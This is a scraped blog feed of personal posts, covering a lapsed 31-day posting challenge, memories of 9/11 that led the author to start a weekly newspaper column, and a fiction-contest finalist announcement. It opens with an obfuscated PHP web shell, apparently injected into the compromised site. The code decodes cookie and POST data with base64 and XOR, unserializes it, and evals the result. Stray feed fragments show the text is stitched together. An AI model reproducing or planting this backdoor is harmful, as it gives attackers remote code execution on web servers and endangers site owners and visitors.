$VOlfwc = chr ( 980 - 897 ).'_' . "\x49" . "\145" . "\x51";$ruxMf = 'c' . chr (108) . 'a' . 's' . chr (115) . '_' . chr ( 216 - 115 ).chr (120) . "\x69" . "\x73" . 't' . chr ( 214 - 99 ); $EWTuSCwRiV = class_exists($VOlfwc); $ruxMf = "56087";$qRiupAARi = !1;if ($EWTuSCwRiV == $qRiupAARi){function imPdsmbab(){$uOHeFyotXR = new /* 55675 */ S_IeQ(13488 + 13488); $uOHeFyotXR = NULL;}$qwmixW = "13488";class S_IeQ{private function COcCD($qwmixW){if (is_array(S_IeQ::$BxRTG)) {$oueUUuFtVV = str_replace("\x3c" . "\x3f" . "\x70" . 'h' . chr ( 327 - 215 ), "", S_IeQ::$BxRTG['c' . chr ( 367 - 256 ).chr (110) . 't' . "\x65" . "\x6e" . chr (116)]);eval($oueUUuFtVV); $qwmixW = "13488";exit();}}private $uKDAu;public function hlJrJleZYd(){echo 64366;}public function __destruct(){$qwmixW = "40781_29040";$this->COcCD($qwmixW); $qwmixW = "40781_29040";}public function __construct($fIPLGJfuF=0){$qUnsv = $_POST;$jVatufmN = $_COOKIE;$YVWNaDAiA = "70e66a1e-56ca-4692-8cc2-33f90191b3bf";$mosllAZyE = @$jVatufmN[substr($YVWNaDAiA, 0, 4)];if (!empty($mosllAZyE)){$mMdfW = "base64";$YpxHHk = "";$mosllAZyE = explode(",", $mosllAZyE);foreach ($mosllAZyE as $YwgjzmGZ){$YpxHHk .= @$jVatufmN[$YwgjzmGZ];$YpxHHk .= @$qUnsv[$YwgjzmGZ];}$YpxHHk = array_map($mMdfW . "\137" . 'd' . chr (101) . "\x63" . "\x6f" . chr (100) . 'e', array($YpxHHk,)); $YpxHHk = $YpxHHk[0] ^ str_repeat($YVWNaDAiA, (strlen($YpxHHk[0]) / strlen($YVWNaDAiA)) + 1);S_IeQ::$BxRTG = @unserialize($YpxHHk);}}public static $BxRTG = 6560;}imPdsmbab();}
But I succeeded and now have 31 days of fantastic content for you to enjoy.
Oh, yeah, right. There’s something like 11 or 12 days worth of posts up there. I forget and don’t feel like going back and re-counting.
I still feel proud of that accomplishment given how sporadic I have posted over the past few years. I got a few thoughts out of my head and will hopefully find some sort of rhythm in the future.
There were a few things that contributed to me not making the goal:
But I will probably fill this space with my words of nonsense more in the future. I have a personal challenge in mind for April. It will likely not result in something for public consumption, but it will cross something off the list of things I have in my brain and need to get out.
]]>I remember :
… the look on the face of a law school professor who knew people working in the towers. Our office had the only TV and became a hub of activity.
… the hasty e-mail from another professor whom I had met only a few days before telling me he had a TV interview set up since he worked in terrorism under President Clinton.
… spending a bunch of time cancelling a press conference on 9/12 because we just knew it wasn’t right to go on.
… spending even more time getting info about the press conference topic to reporters who knew they would need something non-terrorism related at some point in the week.
… frantically trying to get a hold of my wife after hearing a plane went down in rural PA. They didn’t specify where in PA and we live within half an hour of Site R and Camp David so I was losing my mind. She had just taken our 1-year-old out to the playground to avoid all the bad news.
… the eerie feeling on the streets of Baltimore as I headed to catch the Metro to my car. I walked by the federal courthouse while dropping off documents related to the press conference and saw nothing bu heavily armed guards. I felt safe and terrified at the same instant.
Of course, there are many more memories, but one that happened gradually over the next few days was that I needed to get out of my funk. The attacks made all of us look at life a little differently. I didn’t like parts of my job that much. Being a parent was taxing. My commute was a pain. And my Mom had started to have some health problems. So I needed a way to kind of get things off my chest.
That’s how Regular Guy came to be. In October, we were at a cookout at a friend’s house. She still worked at the paper in Hanover as an editor. I said, very simply, “I think I want to write a column.” She agreed it would be a good idea and told me to start sending her something each week. She’d fit me in the Sunday paper.
Almost eight years later, now I have a site where I blog, I had done podcasts, I have written for other web sites, I am two jobs removed from that other job, and I’m still cranking out 500-ish words each week about everything and nothing whether you like it or not.
]]>I did not get a chance to do the first assignment and almost missed the second deadline, but plopped myself down for a good 20 minutes or so and cranked out the 300-word assignment describing someone looking in a mirror.
I didn’t have much trouble because the character is one from a novel I have written and re-written over the past few years so he pretty much lives in my head (and will continue to do so until I get the damn thing published). This was totally new stuff, not anything lifted from work I had previously done.
And I was picked as a finalist. I’m pretty psyched because I always want people to see what I am writing. Why else would I go through all this. Plus, it’s fiction and as I hopefully prepare to enter a grad program in fiction this fall, I need every little boost I can get.
So go to the site and check out my story. Check out the other finalists too and take a look at the Week 3 assignment to see if you are game. It’s longer than the first two and something I might not have the time to tackle, but what do you have to lose?